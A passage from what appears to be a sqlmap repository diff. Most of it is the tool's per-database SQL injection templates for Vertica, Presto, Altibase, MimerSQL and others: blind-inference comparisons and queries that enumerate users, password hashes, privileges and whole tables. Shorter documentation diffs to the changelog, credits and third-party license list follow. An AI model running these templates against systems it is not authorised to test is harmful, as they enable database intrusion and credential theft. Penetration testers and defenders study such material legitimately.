            <blind query="SELECT column_name FROM v_catalog.columns WHERE table_name='%s' AND table_schema='%s'" query2="SELECT data_type FROM v_catalog.columns WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM v_catalog.columns WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
        </columns>
        <dump_table>
            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
            <blind query="SELECT %s FROM %s.%s ORDER BY %s OFFSET %d LIMIT 1" count="SELECT COUNT(*) FROM %s.%s"/>
        </dump_table>
        <search_db>
            <inband query="SELECT schema_name FROM v_catalog.schemata WHERE %s" condition="schema_name"/>
            <blind query="SELECT DISTINCT(schema_name) FROM v_catalog.schemata WHERE %s ORDER BY 1" count="SELECT COUNT(DISTINCT(schema_name)) FROM v_catalog.schemata WHERE %s" condition="schema_name"/>
        </search_db>
        <search_table>
            <inband query="SELECT schema_name,table_name FROM v_catalog.all_tables WHERE %s" condition="table_name" condition2="schema_name"/>
            <blind query="SELECT DISTINCT(schema_name) FROM v_catalog.all_tables WHERE %s ORDER BY 1" query2="SELECT table_name FROM v_catalog.all_tables WHERE schema_name='%s'" count="SELECT COUNT(DISTINCT(schema_name)) FROM v_catalog.all_tables WHERE %s" count2="SELECT COUNT(table_name) FROM v_catalog.all_tables WHERE schema_name='%s'" condition="table_name" condition2="schema_name"/>
        </search_table>
        <search_column>
            <inband query="SELECT table_schema,table_name FROM v_catalog.columns WHERE %s" condition="column_name" condition2="table_schema" condition3="table_name"/>
            <blind query="SELECT DISTINCT(table_schema) FROM v_catalog.columns WHERE %s ORDER BY 1" query2="SELECT DISTINCT(table_name) FROM v_catalog.columns WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM v_catalog.columns WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM v_catalog.columns WHERE table_schema='%s'" condition="column_name" condition2="table_schema" condition3="table_name"/>
        </search_column>
    </dbms>
    <!-- Mckoi -->
    <!-- NOTE: DBMS with minimalistic set of (restricted) features -->
    <dbms value="Mckoi">
        <cast query="CONCAT('',%s)"/>
        <length query="LENGTH(%s)"/>
        <isnull query="IF(%s IS NULL,' ', %s)"/>
        <delimiter query="||"/>
        <limit/>
        <limitregexp/>
        <limitgroupstart/>
        <limitgroupstop/>
        <limitstring/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
        <comment query=";"/>
        <substring query="SUBSTRING((%s),%d,%d)"/>
        <concatenate query="%s||%s"/>
        <case query="SELECT (IF(%s,1,0))"/>
        <!-- NOTE: other way around does not work -->
        <inference query="'%c'&lt;SUBSTRING((%s),%d,1)"/>
        <banner/>
        <current_user/>
        <current_db/>
        <hostname/>
        <table_comment/>
        <column_comment/>
        <is_dba/>
        <dbs/>
        <tables/>
        <dump_table>
            <inband query="SELECT %s FROM %s"/>
            <blind query="SELECT MIN(%s) FROM %s WHERE CONCAT('',%s)>'%s'" query2="SELECT MAX(%s) FROM %s WHERE CONCAT('',%s) LIKE '%s'" count="SELECT COUNT(*) FROM %s" count2="SELECT COUNT(DISTINCT(%s)) FROM %s"/>
        </dump_table>
        <users/>
        <privileges/>
        <roles/>
        <statements/>
        <search_db/>
        <search_table/>
        <search_column/>
   </dbms>
    <!-- Presto -->
    <dbms value="Presto">
        <cast query="CAST(%s AS VARCHAR(4000))"/>
        <length query="LENGTH(%s)"/>
        <isnull query="COALESCE(%s,' ')"/>
        <delimiter query="||"/>
        <limit query="OFFSET %d LIMIT %d"/>
        <limitregexp query="\s+OFFSET\s+([\d]+)\s+LIMIT\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
        <limitgroupstart query="1"/>
        <limitgroupstop query="2"/>
        <limitstring query=" OFFSET "/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
        <comment query="--"/>
        <substring query="SUBSTR(%s,%d,%d)"/>
        <concatenate query="%s||%s"/>
        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
        <hex query="TO_HEX(%s)"/>
        <inference query="CODEPOINT(SUBSTR((%s),%d,1))>%d" dbms_version="&gt;=0.178" query2="SUBSTR((%s),%d,1)>'%c'"/>/>
        <banner/>
        <current_user query="CURRENT_USER"/>
        <current_db/>
        <hostname/>
        <table_comment query="SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' AND table_name='%s'"/>
        <column_comment query="SELECT column_comment FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s' AND table_name='%s' AND column_name='%s'"/>
        <is_dba/>
        <check_udf/>
        <users/>
        <passwords/>
        <privileges/>
        <roles/>
        <statements/>
        <dbs>
            <inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA"/>
            <blind query="SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA ORDER BY 1 OFFSET %d LIMIT 1" count="SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA"/>
        </dbs>
        <tables>
            <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES" condition="table_schema"/>
            <blind query="SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'"/>
        </tables>
        <columns>
            <inband query="SELECT column_name,data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
            <blind query="SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" query2="SELECT data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
        </columns>
        <dump_table>
            <inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
            <blind query="SELECT %s FROM %s.%s ORDER BY %s OFFSET %d LIMIT 1" count="SELECT COUNT(*) FROM %s.%s"/>
        </dump_table>
        <search_db>
            <inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
            <blind query="SELECT DISTINCT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" count="SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
        </search_db>
        <search_table>
            <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES WHERE %s" condition="table_name" condition2="table_schema"/>
            <blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.TABLES WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.TABLES WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" condition="table_name" condition2="table_schema"/>
        </search_table>
        <search_column>
            <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" condition="column_name" condition2="table_schema" condition3="table_name"/>
            <blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" condition="column_name" condition2="table_schema" condition3="table_name"/>
        </search_column>
    </dbms>
    <!-- Altibase -->
    <dbms value="Altibase">
        <cast query="CAST(%s AS VARCHAR(4000))"/>
        <length query="LENGTH(%s)"/>
        <isnull query="NVL(%s,' ')"/>
        <delimiter query="||"/>
        <limit query="LIMIT %d,%d"/>
        <limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
        <limitgroupstart query="1"/>
        <limitgroupstop query="2"/>
        <limitstring query=" LIMIT "/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
        <comment query="--" query2="/*"/>
        <substring query="SUBSTR((%s),%d,%d)"/>
        <concatenate query="%s||%s"/>
        <case query="SELECT (CASE WHEN (%s) THEN 1 ELSE 0 END)"/>
        <hex query="HEX_ENCODE(%s)"/>
        <inference query="ASCII(SUBSTR((%s),%d,1))>%d"/>
        <banner query="SELECT PRODUCT_SIGNATURE FROM V$DATABASE"/>
        <current_user query="USER_NAME()"/>
        <current_db query="USER_NAME()"/>
        <hostname/>
        <table_comment query="SELECT COMMENTS FROM SYSTEM_.SYS_COMMENTS_ WHERE USER_NAME='%s' AND TABLE_NAME='%s'"/>
        <column_comment query="SELECT COMMENTS FROM SYSTEM_.SYS_COMMENTS_ WHERE USER_NAME='%s' AND TABLE_NAME='%s' AND COLUMN_NAME='%s'"/>
        <is_dba query="(SELECT COUNT(*) FROM SYSTEM_.DBA_USERS_ WHERE USER_NAME=USER_NAME())=1"/>
        <users>
            <inband query="SELECT USER_NAME FROM SYSTEM_.SYS_USERS_"/>
            <blind query="SELECT USER_NAME FROM SYSTEM_.SYS_USERS_ LIMIT %d,1" count="SELECT COUNT(USER_NAME) FROM SYSTEM_.SYS_USERS_"/>
        </users>
        <passwords>
            <inband query="SELECT USER_NAME,PASSWORD FROM SYSTEM_.SYS_USERS_" condition="USER_NAME"/>
            <blind query="SELECT PASSWORD FROM SYSTEM_.SYS_USERS_ WHERE USER_NAME='%s'" count="SELECT COUNT(PASSWORD) FROM SYSTEM_.SYS_USERS_ WHERE USER_NAME='%s'"/>
        </passwords>
        <privileges>
            <inband query="SELECT USER_NAME,PRIV_NAME FROM SYSTEM_.SYS_GRANT_OBJECT_ JOIN SYSTEM_.SYS_PRIVILEGES_ ON SYSTEM_.SYS_GRANT_OBJECT_.PRIV_ID=SYSTEM_.SYS_PRIVILEGES_.PRIV_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_GRANT_OBJECT_.GRANTEE_ID" condition="USER_NAME"/>
            <blind query="SELECT PRIV_NAME FROM SYSTEM_.SYS_GRANT_OBJECT_ JOIN SYSTEM_.SYS_PRIVILEGES_ ON SYSTEM_.SYS_GRANT_OBJECT_.PRIV_ID=SYSTEM_.SYS_PRIVILEGES_.PRIV_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_GRANT_OBJECT_.GRANTEE_ID WHERE USER_NAME='%d' LIMIT %d,1" count="SELECT COUNT(PRIV_NAME) FROM SYSTEM_.SYS_GRANT_OBJECT_ JOIN SYSTEM_.SYS_PRIVILEGES_ ON SYSTEM_.SYS_GRANT_OBJECT_.PRIV_ID=SYSTEM_.SYS_PRIVILEGES_.PRIV_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_GRANT_OBJECT_.GRANTEE_ID WHERE USER_NAME='%d'"/>
        </privileges>
        <roles>
            <inband query="SELECT GRANTEE.USER_NAME AS GRANTEE, USER_ROLE.USER_NAME AS GRANTED_ROLE FROM SYSTEM_.SYS_USER_ROLES_ JOIN SYSTEM_.SYS_USERS_ GRANTEE ON GRANTEE_ID=GRANTEE.USER_ID JOIN SYSTEM_.SYS_USERS_ USER_ROLE ON ROLE_ID=USER_ROLE.USER_ID" condition="GRANTEE"/>
            <blind query="SELECT USER_ROLE.USER_NAME AS GRANTED_ROLE FROM SYSTEM_.SYS_USER_ROLES_ JOIN SYSTEM_.SYS_USERS_ GRANTEE ON GRANTEE_ID=GRANTEE.USER_ID JOIN SYSTEM_.SYS_USERS_ USER_ROLE ON ROLE_ID=USER_ROLE.USER_ID WHERE GRANTEE.USER_NAME='%s' LIMIT %d,1" count="SELECT COUNT(*) FROM SYSTEM_.SYS_USER_ROLES_ JOIN SYSTEM_.SYS_USERS_ GRANTEE ON GRANTEE_ID=GRANTEE.USER_ID JOIN SYSTEM_.SYS_USERS_ USER_ROLE ON ROLE_ID=USER_ROLE.USER_ID WHERE GRANTEE.USER_NAME='%s'"/>
        </roles>
        <statements/>
        <dbs>
            <inband query="SELECT USER_NAME FROM SYSTEM_.SYS_USERS_"/>
            <blind query="SELECT USER_NAME FROM SYSTEM_.SYS_USERS_ LIMIT %d,1" count="SELECT COUNT(USER_NAME) FROM SYSTEM_.SYS_USERS_"/>
        </dbs>
        <tables>
            <inband query="SELECT USER_NAME,TABLE_NAME FROM SYSTEM_.SYS_TABLES_ JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID" condition="USER_NAME"/>
            <blind query="SELECT TABLE_NAME FROM SYSTEM_.SYS_TABLES_ JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE USER_NAME='%s' LIMIT %d,1" count="SELECT COUNT(TABLE_NAME) FROM SYSTEM_.SYS_TABLES_ JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE USER_NAME='%s'"/>
        </tables>
        <columns>
            <inband query="SELECT COLUMN_NAME,DATA_TYPE FROM SYSTEM_.SYS_COLUMNS_ JOIN SYSTEM_.SYS_TABLES_ ON SYSTEM_.SYS_COLUMNS_.TABLE_ID=SYSTEM_.SYS_TABLES_.TABLE_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE TABLE_NAME='%s' AND USER_NAME='%s'" condition="COLUMN_NAME"/>
            <blind query="SELECT COLUMN_NAME FROM SYSTEM_.SYS_COLUMNS_ JOIN SYSTEM_.SYS_TABLES_ ON SYSTEM_.SYS_COLUMNS_.TABLE_ID=SYSTEM_.SYS_TABLES_.TABLE_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE TABLE_NAME='%s' AND USER_NAME='%s'" query2="SELECT DATA_TYPE FROM SYSTEM_.SYS_COLUMNS_ JOIN SYSTEM_.SYS_TABLES_ ON SYSTEM_.SYS_COLUMNS_.TABLE_ID=SYSTEM_.SYS_TABLES_.TABLE_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s' AND USER_NAME='%s'" count="SELECT COUNT(COLUMN_NAME) FROM SYSTEM_.SYS_COLUMNS_ JOIN SYSTEM_.SYS_TABLES_ ON SYSTEM_.SYS_COLUMNS_.TABLE_ID=SYSTEM_.SYS_TABLES_.TABLE_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE TABLE_NAME='%s' AND USER_NAME='%s'" condition="COLUMN_NAME"/>
        </columns>
        <dump_table>
            <inband query="SELECT %s FROM %s"/>
            <blind query="SELECT %s FROM %s LIMIT %d,1" count="SELECT COUNT(*) FROM %s"/>
        </dump_table>
        <search_db>
            <inband query="SELECT USER_NAME FROM SYSTEM_.SYS_USERS_ WHERE %s" condition="USER_NAME"/>
            <blind query="SELECT DISTINCT(USER_NAME) FROM SYSTEM_.SYS_USERS_ WHERE %s" count="SELECT COUNT(DISTINCT(USER_NAME)) FROM SYSTEM_.SYS_USERS_ WHERE %s" condition="USER_NAME"/>
        </search_db>
        <search_table>
            <inband query="SELECT USER_NAME,TABLE_NAME FROM SYSTEM_.SYS_TABLES_ JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE %s" condition="TABLE_NAME" condition2="USER_NAME"/>
            <blind query="SELECT DISTINCT(USER_NAME) FROM SYSTEM_.SYS_TABLES_ JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE %s" query2="SELECT DISTINCT(TABLE_NAME) FROM SYSTEM_.SYS_TABLES_ JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE USER_NAME='%s'" count="SELECT COUNT(DISTINCT(USER_NAME)) FROM SYSTEM_.SYS_TABLES_ JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE %s" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYSTEM_.SYS_TABLES_ JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE USER_NAME='%s'" condition="TABLE_NAME" condition2="USER_NAME"/>
        </search_table>
        <search_column>
            <inband query="SELECT USER_NAME,TABLE_NAME FROM SYSTEM_.SYS_COLUMNS_ JOIN SYSTEM_.SYS_TABLES_ ON SYSTEM_.SYS_COLUMNS_.TABLE_ID=SYSTEM_.SYS_TABLES_.TABLE_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE %s" condition="COLUMN_NAME" condition2="USER_NAME" condition3="TABLE_NAME"/>
            <blind query="SELECT DISTINCT(USER_NAME) FROM SYSTEM_.SYS_COLUMNS_ JOIN SYSTEM_.SYS_TABLES_ ON SYSTEM_.SYS_COLUMNS_.TABLE_ID=SYSTEM_.SYS_TABLES_.TABLE_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE %s" query2="SELECT DISTINCT(TABLE_NAME) FROM SYSTEM_.SYS_COLUMNS_ JOIN SYSTEM_.SYS_TABLES_ ON SYSTEM_.SYS_COLUMNS_.TABLE_ID=SYSTEM_.SYS_TABLES_.TABLE_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE USER_NAME='%s'" count="SELECT COUNT(DISTINCT(USER_NAME)) FROM SYSTEM_.SYS_COLUMNS_ JOIN SYSTEM_.SYS_TABLES_ ON SYSTEM_.SYS_COLUMNS_.TABLE_ID=SYSTEM_.SYS_TABLES_.TABLE_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE %s" count2="SELECT COUNT(DISTINCT(TABLE_NAME)) FROM SYSTEM_.SYS_COLUMNS_ JOIN SYSTEM_.SYS_TABLES_ ON SYSTEM_.SYS_COLUMNS_.TABLE_ID=SYSTEM_.SYS_TABLES_.TABLE_ID JOIN SYSTEM_.SYS_USERS_ ON SYSTEM_.SYS_USERS_.USER_ID=SYSTEM_.SYS_TABLES_.USER_ID WHERE USER_NAME='%s'" condition="COLUMN_NAME" condition2="USER_NAME" condition3="TABLE_NAME"/>
        </search_column>
    </dbms>
    <!-- MimerSQL -->
    <!-- NOTE: DBMS with stohastic output of rows (ORDER BY required) -->
    <dbms value="MimerSQL">
        <!-- NOTE: NVARCHAR(4000) causes problems in boolean (e.g. 'Required temporary table row length is 32006, only 32000 is possible') -->
        <cast query="CAST(%s AS NVARCHAR(1000))"/>
        <length query="CHAR_LENGTH(%s)"/>
        <isnull query="COALESCE(%s,' ')"/>
        <delimiter query="||"/>
        <limit query="OFFSET %d FETCH %d"/>
        <limitregexp query="\s+OFFSET\s+([\d]+)\s+FETCH\s+([\d]+)" query2="\s+FETCH\s+([\d]+)"/>
        <limitgroupstart query="1"/>
        <limitgroupstop query="2"/>
        <limitstring query=" OFFSET "/>
        <order query="ORDER BY %s ASC"/>
        <count query="COUNT(%s)"/>
        <comment query="--"/>
        <substring query="SUBSTRING((%s),%d,%d)"/>
        <concatenate query="%s||%s"/>
        <case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
        <inference query="UNICODE_CODE(SUBSTRING((%s),%d,1))>%d"/>
        <banner query="SELECT attribute_value FROM SYSTEM.SERVER_INFO WHERE server_attribute='CATALOG_VERSION_CURRENT'"/>
        <current_user query="USER()"/>
        <current_db query="USER()"/>
        <hostname/>
        <table_comment/>
        <column_comment/>
        <is_dba query="(SELECT COUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE schema_owner=USER())>0"/>
        <check_udf/>
        <!-- Reference: https://download.mimer.com/pub/developer/docs/html_110/Mimer_SQL_Engine_DocSet/App_D_Dic_tables2.html -->
        <users>
            <inband query="SELECT user_name FROM SYSTEM.USERS"/>
            <blind query="SELECT user_name FROM SYSTEM.USERS ORDER BY user_name OFFSET %d FETCH 1" count="SELECT COUNT(user_name) FROM SYSTEM.USERS"/>
        </users>
        <passwords/>
        <privileges>
            <inband query="SELECT DISTINCT user_name,privilege_type FROM SYSTEM.TABLE_PRIVILEGES JOIN SYSTEM.USERS ON SYSTEM.TABLE_PRIVILEGES.GRANTEE_SYSID=SYSTEM.USERS.USER_SYSID" condition="user_name"/>
            <blind query="SELECT DISTINCT(privilege_type) FROM SYSTEM.TABLE_PRIVILEGES JOIN SYSTEM.USERS ON SYSTEM.TABLE_PRIVILEGES.GRANTEE_SYSID=SYSTEM.USERS.USER_SYSID WHERE user_name='%s' ORDER BY privilege_type OFFSET %d FETCH 1" count="SELECT COUNT(DISTINCT(privilege_type)) FROM SYSTEM.TABLE_PRIVILEGES JOIN SYSTEM.USERS ON SYSTEM.TABLE_PRIVILEGES.GRANTEE_SYSID=SYSTEM.USERS.USER_SYSID WHERE user_name='%s'"/>
        </privileges>
        <roles/>
        <statements/>
        <dbs>
            <inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA"/>
            <blind query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA ORDER BY schema_name OFFSET %d FETCH 1" count="SELECT COUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA"/>
        </dbs>
        <tables>
            <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES" condition="table_schema"/>
            <blind query="SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' ORDER BY table_name OFFSET %d FETCH 1" count="SELECT COUNT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'"/>
        </tables>
        <columns>
            <inband query="SELECT column_name,data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
            <blind query="SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s' ORDER BY column_name" query2="SELECT data_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
        </columns>
        <dump_table>
            <inband query="SELECT %s FROM %s"/>
            <blind query="SELECT %s FROM %s ORDER BY %s OFFSET %d FETCH 1" count="SELECT COUNT(*) FROM %s"/>
        </dump_table>
        <search_db>
            <inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
            <blind query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s ORDER BY schema_name" count="SELECT COUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
        </search_db>
        <search_table>
            <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES WHERE %s" condition="table_name" condition2="table_schema"/>
            <blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.TABLES WHERE %s ORDER BY table_schema" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s' ORDER BY table_name" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.TABLES WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" condition="table_name" condition2="table_schema"/>
        </search_table>
        <search_column>
            <inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" condition="column_name" condition2="table_schema" condition3="table_name"/>
            <blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s ORDER BY table_schema" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s' ORDER BY table_name" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" condition="column_name" condition2="table_schema" condition3="table_name"/>
        </search_column>
    </dbms>
 </root>
--- a/doc/CHANGELOG.md
+++ b/doc/CHANGELOG.md
@@ -1,3 +1,20 @@
 # Version 1.4 (2020-01-01)
 * [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.3...1.4)
 * [View issues](https://github.com/sqlmapproject/sqlmap/milestone/5?closed=1)
 # Version 1.3 (2019-01-05)
 * [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.2...1.3)
 # Version 1.2 (2018-01-08)
 * [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.1...1.2)
 # Version 1.1 (2017-04-07)
 * [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.0...1.1)
 # Version 1.0 (2016-02-27)
 * Implemented support for automatic decoding of page content through detected charset.
--- a/doc/FAQ.pdf
+++ b/doc/FAQ.pdf
--- a/doc/README.pdf
+++ b/doc/README.pdf
--- a/doc/THANKS.md
+++ b/doc/THANKS.md
@@ -202,7 +202,7 @@ Tate Hansen, <tate(at)clearnetsec.com>
 Mario Heiderich, <mario.heiderich(at)gmail.com>
 Christian Matthies, <ch0012(at)gmail.com>
 Lars H. Strojny, <lars(at)strojny.net>
-* for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, http://php-ids.org
+* for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, https://github.com/PHPIDS/PHPIDS
 Kristian Erik Hermansen, <kristian.hermansen(at)gmail.com>
 * for reporting a bug
@@ -764,6 +764,12 @@ ultramegaman, <seclists(at)ultramegaman.com>
 Vinicius, <viniciusmaxdaloop(at)gmail.com>
 * for reporting a minor bug
 virusdefender
 * for contributing WAF scripts safeline.py
 w8ay
 * for contributing an implementation for chunked transfer-encoding (switch --chunked)
 wanglei, <wanglei(at)17uxi.cn>
 * for reporting a minor bug
--- a/doc/THIRD-PARTY.md
+++ b/doc/THIRD-PARTY.md
@@ -2,27 +2,22 @@ This file lists bundled packages and their associated licensing terms.
 # BSD
-* The Ansistrm library located under thirdparty/ansistrm/.
+* The `Ansistrm` library located under `thirdparty/ansistrm/`.
  Copyright (C) 2010-2012, Vinay Sajip.
-* The Beautiful Soup library located under thirdparty/beautifulsoup/.
+* The `Beautiful Soup` library located under `thirdparty/beautifulsoup/`.
  Copyright (C) 2004-2010, Leonard Richardson.
-* The ClientForm library located under thirdparty/clientform/.
+* The `ClientForm` library located under `thirdparty/clientform/`.
  Copyright (C) 2002-2007, John J. Lee.
  Copyright (C) 2005, Gary Poster.
  Copyright (C) 2005, Zope Corporation.
  Copyright (C) 1998-2000, Gisle Aas.
-* The Colorama library located under thirdparty/colorama/.
+* The `Colorama` library located under `thirdparty/colorama/`.
  Copyright (C) 2013, Jonathan Hartley.
-* The Fcrypt library located under thirdparty/fcrypt/.
+* The `Fcrypt` library located under `thirdparty/fcrypt/`.
  Copyright (C) 2000, 2001, 2004 Carey Evans.
-* The Odict library located under thirdparty/odict/.
+* The `PrettyPrint` library located under `thirdparty/prettyprint/`.
  Copyright (C) 2005, Nicola Larosa, Michael Foord.
 * The Oset library located under thirdparty/oset/.
  Copyright (C) 2010, BlueDynamics Alliance, Austria.
  Copyright (C) 2009, Raymond Hettinger, and others.
 * The PrettyPrint library located under thirdparty/prettyprint/.
  Copyright (C) 2010, Chris Hall.
-* The SocksiPy library located under thirdparty/socks/.
+* The `SocksiPy` library located under `thirdparty/socks/`.
  Copyright (C) 2006, Dan-Haim.
 ````
@@ -51,17 +46,17 @@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 # LGPL
-* The Chardet library located under thirdparty/chardet/.
+* The `Chardet` library located under `thirdparty/chardet/`.
  Copyright (C) 2008, Mark Pilgrim.
-* The Gprof2dot library located under thirdparty/gprof2dot/.
+* The `Gprof2dot` library located under `thirdparty/gprof2dot/`.
  Copyright (C) 2008-2009, Jose Fonseca.
-* The KeepAlive library located under thirdparty/keepalive/.
+* The `KeepAlive` library located under `thirdparty/keepalive/`.
  Copyright (C) 2002-2003, Michael D. Stenner.
-* The MultipartPost library located under thirdparty/multipart/.
+* The `MultipartPost` library located under `thirdparty/multipart/`.
  Copyright (C) 2006, Will Holcomb.
-* The XDot library located under thirdparty/xdot/.
+* The `XDot` library located under `thirdparty/xdot/`
  Copyright (C) 2008, Jose Fonseca.
-* The icmpsh tool located under extra/icmpsh/.
